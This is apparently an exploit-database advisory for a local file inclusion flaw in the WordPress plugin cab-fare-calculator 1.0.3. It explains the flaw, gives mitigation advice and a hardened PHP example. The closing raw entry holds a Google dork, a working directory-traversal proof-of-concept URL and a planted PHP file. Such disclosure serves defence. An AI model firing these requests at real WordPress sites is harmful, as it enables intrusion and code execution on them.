WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion - exploit.company
vendor: cab-fare-calculator
by: Hassan Khan Yusufzai - Splint3r7
CVSS: 8.8 (HIGH)
Vulnerability type: Local File Inclusion
CWE: 98 (Improper Control of Filename for Include/Require Statement in PHP Program)
Product Name: cab-fare-calculator
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: YES
Related CWE:
CPE: a:wordpress:wordpress_plugin:cab-fare-calculator
Metasploit:
Other Scripts:
Platforms Tested: Firefox
Year: 2022

WordPress Plugin cab-fare-calculator 1.0.3 – Local File Inclusion

The vulnerability exists because tblight.php passes the user-supplied 'controller' GET parameter, without any sanitization, straight into require_once('controllers/' . $_GET['controller'] . '.php') whenever 'action' is non-empty and 'ajax' equals 1. Directory-traversal sequences ('../') in the parameter escape the controllers/ directory, so a remote attacker who requests the script directly under wp-content/plugins/ (the snippet performs no authentication, capability or nonce check) can include any file on the local filesystem whose name ends in '.php', and the included file is executed as PHP. Because the '.php' suffix is appended by the script, executing attacker-controlled code additionally requires first placing a '.php' file somewhere on the host; the proof of concept below uses /etc/index.php for that purpose.

Mitigation:

Update the plugin to a version that addresses this issue (the vendor indicates a patch exists; see the plugin page on wordpress.org). On the code side, the fix is to never build an include path from request input: map the 'controller' parameter against a fixed allowlist of controller names, or at minimum strip directory components with basename() and verify with realpath() that the resolved file lies inside the plugin's controllers/ directory before calling require_once. Until the update is applied, direct access to tblight.php can be blocked at the web server, and affected hosts should be checked for unexpected '.php' files outside the web root (the proof of concept places one at /etc/index.php).
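To make the mitigation concrete, the following is an added example written for this page, not code from the cab-fare-calculator plugin or its vendor. It places the vulnerable dispatch pattern from tblight.php next to a hardened version that accepts only an allowlisted controller name and confirms the resolved path still lies inside controllers/, then exercises both against a traversal payload and a legitimate name on a throwaway directory tree. The cfc_* function names, the controller names in the allowlist and the temporary directory layout are assumptions made for illustration.

```php
<?php
// Added example for this page, not code from the cab-fare-calculator plugin.
// The cfc_* function names, the allowlisted controller names and the temp
// directory layout are assumptions made for illustration.

// Vulnerable pattern, as in tblight.php 1.0.3: the user-supplied name is
// concatenated into the include path. "../" sequences escape controllers/
// and, since ".php" is appended, any .php file on the host can be included.
// This function only builds the path; it never includes it.
function cfc_vulnerable_path(array $get): ?string
{
    if (!empty($get['controller']) && !empty($get['action']) &&
        !empty($get['ajax']) && $get['ajax'] == 1) {
        return 'controllers/' . $get['controller'] . '.php';
    }
    return null;
}

// Hardened version: the name must be one of a fixed set of controllers, and
// the resolved file must still be inside controllers/ after realpath().
// Returns the absolute path to include, or null to refuse the request.
function cfc_safe_controller_path(string $plugin_dir, string $controller): ?string
{
    $allowed = ['fare', 'settings']; // assumed controller names

    if (!in_array($controller, $allowed, true)) {
        return null;
    }
    $controllers_dir = realpath($plugin_dir . '/controllers');
    if ($controllers_dir === false) {
        return null;
    }
    $candidate = realpath($controllers_dir . '/' . $controller . '.php');
    if ($candidate === false) {
        return null;
    }
    // Defence in depth against a symlinked controller file: the resolved
    // path must start with the controllers directory plus a separator.
    $prefix = $controllers_dir . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Demonstration on a throwaway tree under the system temp directory.
$base = sys_get_temp_dir() . '/cfc_demo_' . getmypid();
mkdir($base . '/controllers', 0700, true);
file_put_contents($base . '/controllers/fare.php', "<?php echo \"fare controller loaded\\n\";\n");
file_put_contents($base . '/outside.php', "<?php echo \"file outside controllers/ loaded\\n\";\n");

// Constructed request inputs: a traversal payload and a legitimate name.
$attacker = ['controller' => '../outside', 'action' => '1', 'ajax' => '1'];
$legit    = ['controller' => 'fare',       'action' => '1', 'ajax' => '1'];

chdir($base);
echo "vulnerable path for attacker input: ", var_export(cfc_vulnerable_path($attacker), true), "\n";
echo "that file exists on disk: ", var_export(file_exists(cfc_vulnerable_path($attacker)), true), "\n";

echo "hardened path for attacker input: ", var_export(cfc_safe_controller_path($base, $attacker['controller']), true), "\n";
$safe = cfc_safe_controller_path($base, $legit['controller']);
echo "hardened path for legitimate input: ", var_export($safe, true), "\n";
if ($safe !== null) {
    require_once $safe; // only reached with an allowlisted, in-directory file
}

// Clean up the demo tree.
unlink($base . '/controllers/fare.php');
unlink($base . '/outside.php');
rmdir($base . '/controllers');
rmdir($base);
```

Run it from the command line with `php` on the file; the vulnerable builder resolves the traversal payload to a file outside controllers/ that exists on disk, while the hardened resolver returns null for it and an absolute in-directory path for the legitimate name. The allowlist alone already stops the traversal; the realpath() prefix check is kept so that the decision does not depend on the allowlist staying complete and correct as controllers are added.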

Exploit-DB raw data:

# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/
# Version: 1.0.3
# Tested on: Firefox
# Vulnerable File: tblight.php

# Impact:

Local File Read / Code Execution

# Vulnerable Code:

```
if(!empty($_GET['controller']) && !empty($_GET['action']) &&
!empty($_GET['ajax']) && $_GET['ajax'] == 1)
{
    require_once('' . 'controllers/'.$_GET['controller'].'.php');
}
```

# Proof of concept:

http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1

# POC Code Execution:

/etc/index.php:

<?php echo "Local file read"; phpinfo(); ?>